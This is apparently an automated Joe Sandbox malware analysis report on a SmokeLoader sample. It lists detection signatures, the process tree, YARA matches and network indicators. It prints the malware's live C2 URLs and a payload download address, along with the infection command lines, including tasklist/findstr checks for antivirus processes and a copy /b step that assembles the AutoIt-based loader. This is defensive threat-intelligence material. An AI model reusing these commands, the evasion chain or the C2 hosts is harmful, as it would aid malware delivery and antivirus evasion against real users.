Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lSmb6nDsrC.exe

Overview

General Information

Sample name:lSmb6nDsrC.exe
renamed because original name is a hash value
Original sample name:83741bbca9631aa4925203fbddc0ad7d.exe
Analysis ID:1478963
MD5:83741bbca9631aa4925203fbddc0ad7d
SHA1:f636ef4f3279cd49d1036a70293f8390ecc96a3e
SHA256:538af0e39f24f16e4e52cad03295a359304d8f458c1fe18d0681e884112f2185
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • lSmb6nDsrC.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\lSmb6nDsrC.exe" MD5: 83741BBCA9631AA4925203FBDDC0AD7D)
    • cmd.exe (PID: 2080 cmdline: "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3868 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5408 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6880 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5872 cmdline: cmd /c md 55116385 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1720 cmdline: findstr /V "SlutSteLouisTranslation" Cyprus MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6856 cmdline: cmd /c copy /b Breeding + Fuji + Weather 55116385\s MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Labs.pif (PID: 7244 cmdline: 55116385\Labs.pif 55116385\s MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • Labs.pif (PID: 8056 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
          • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • PING.EXE (PID: 7272 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 1 entries

        System Summary

        barindex
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 55116385\Labs.pif 55116385\s, CommandLine: 55116385\Labs.pif 55116385\s, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2080, ParentProcessName: cmd.exe, ProcessCommandLine: 55116385\Labs.pif 55116385\s, ProcessId: 7244, ProcessName: Labs.pif

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2080, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6880, ProcessName: findstr.exe
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: lSmb6nDsrC.exeAvira: detected
        Source: http://cellc.org/tmp/index.phpAvira URL Cloud: Label: malware
        Source: https://2no.co/MR)Avira URL Cloud: Label: malware
        Source: https://2no.co/16G965ZCAvira URL Cloud: Label: malware
        Source: http://piratia.su/tmp/index.phpAvira URL Cloud: Label: malware
        Source: http://piratia-life.ru/tmp/index.phpAvira URL Cloud: Label: malware
        Source: http://icebrasilpr.com/tmp/index.phpAvira URL Cloud: Label: malware
        Source: http://h-c-v.ru/tmp/index.phpAvira URL Cloud: Label: malware
        Source: https://2no.co/16G965Avira URL Cloud: Label: malware
        Source: https://2no.co/hRAvira URL Cloud: Label: malware
        Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
        Source: http://cellc.org/tmp/index.phpVirustotal: Detection: 21%Perma Link
        Source: http://piratia.su/tmp/index.phpVirustotal: Detection: 15%Perma Link
        Source: http://piratia-life.ru/tmp/index.phpVirustotal: Detection: 15%Perma Link
        Source: http://h-c-v.ru/tmp/index.phpVirustotal: Detection: 23%Perma Link
        Source: http://icebrasilpr.com/tmp/index.phpVirustotal: Detection: 19%Perma Link
        Source: lSmb6nDsrC.exeVirustotal: Detection: 68%Perma Link
        Source: lSmb6nDsrC.exeReversingLabs: Detection: 60%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: lSmb6nDsrC.exeJoe Sandbox ML: detected
        Source: lSmb6nDsrC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.7:49703 version: TLS 1.2
        Source: lSmb6nDsrC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_007D4005
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_007D494A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_007DC2FF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DCD14 FindFirstFileW,FindClose,19_2_007DCD14
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_007DCD9F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_007DF5D8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_007DF735
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_007DFA36
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_007D3CE2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_007D4005
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_007DC2FF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_007D494A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DCD14 FindFirstFileW,FindClose,27_2_007DCD14
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_007DCD9F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_007DF5D8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_007DF735
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_007DFA36
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_007D3CE2
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

        Networking

        barindex
        Source: Malware configuration extractorURLs: http://cellc.org/tmp/index.php
        Source: Malware configuration extractorURLs: http://h-c-v.ru/tmp/index.php
        Source: Malware configuration extractorURLs: http://icebrasilpr.com/tmp/index.php
        Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/index.php
        Source: Malware configuration extractorURLs: http://piratia.su/tmp/index.php
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007E29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_007E29BA
        Source: global trafficHTTP traffic detected: GET /16G965 HTTP/1.1User-Agent: SkHost: 2no.co
        Source: global trafficDNS traffic detected: DNS query: 2no.co
        Source: global trafficDNS traffic detected: DNS query: UaTVQmthThJ.UaTVQmthThJ
        Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
        Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: lSmb6nDsrC.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: lSmb6nDsrC.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
        Source: lSmb6nDsrC.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: lSmb6nDsrC.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
        Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lSmb6nDsrC.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: lSmb6nDsrC.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: lSmb6nDsrC.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
        Source: lSmb6nDsrC.exe, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: lSmb6nDsrC.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: explorer.exe, 0000001C.00000002.2483780350.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2483829342.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2482661406.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: lSmb6nDsrC.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
        Source: lSmb6nDsrC.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: lSmb6nDsrC.exeString found in binary or memory: http://www.aimp.ru0
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000000.1277873491.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif, 0000001B.00000000.2191675925.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: Labs.pif, 00000013.00000003.2252607198.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2257598808.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965
        Source: Labs.pif, 00000013.00000003.2252607198.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2257598808.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965ZC
        Source: Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/MR)
        Source: Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/hR
        Source: explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
        Source: explorer.exe, 0000001C.00000002.2484651579.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307967181.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000001C.00000000.2307149631.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000001C.00000000.2299433125.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
        Source: explorer.exe, 0000001C.00000000.2307149631.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
        Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
